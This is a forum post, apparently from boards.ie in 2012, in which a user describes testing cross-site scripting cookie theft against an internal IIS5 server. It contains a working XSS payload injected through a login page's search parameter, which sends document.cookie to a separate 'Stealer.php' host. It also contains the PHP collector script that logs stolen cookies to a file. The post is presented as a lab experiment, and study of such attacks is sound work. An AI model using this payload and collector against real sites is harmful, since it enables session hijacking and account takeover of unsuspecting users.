Help Keep Boards Alive. Support us by going ad free today. See here: https://subscriptions.boards.ie/.
If we do not hit our goal we will be forced to close the site.

Current status: https://keepboardsalive.com/

Annual subs are best for most impact. If you are still undecided on going Ad Free - you can also donate using the Paypal Donate option. All contribution helps. Thank you.

https://www.boards.ie/group/1878-subscribers-forum

Private Group for paid up members of Boards.ie. Join the club.

XSS Cookie stealing against IIS5 server

CFC1969 · 2012-06-29 23:22:20

A Chara Am playing with cookie stealing (XSS) against IIS5 server on internal network. Injecting this code in forum mail: hxxp://10.xx.xx.xx/login.asp?search= location.href = 'http://10.xx.xx.xx/Stealer.php?cookie='+document.cookie; When I logout and relogin as new user, I get the PHP popping up, asking do…

30-06-2012 12:22AM

#1

CFC1969

Registered Users, Registered Users 2 Posts: 296 ✭✭

Join Date: June 2008

Posts: 224

A Chara

Am playing with cookie stealing (XSS) against IIS5 server on internal network.

Injecting this code in forum mail:

hxxp://10.xx.xx.xx/login.asp?search=<script>location.href = 'http://10.xx.xx.xx/Stealer.php?cookie='+document.cookie;</script>

When I logout and relogin as new user, I get the PHP popping up, asking do I want to open with notepad.

Can you load PHP files on IIS , Everything on server is ASP ...

BELOW IS SCRIPT

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>

0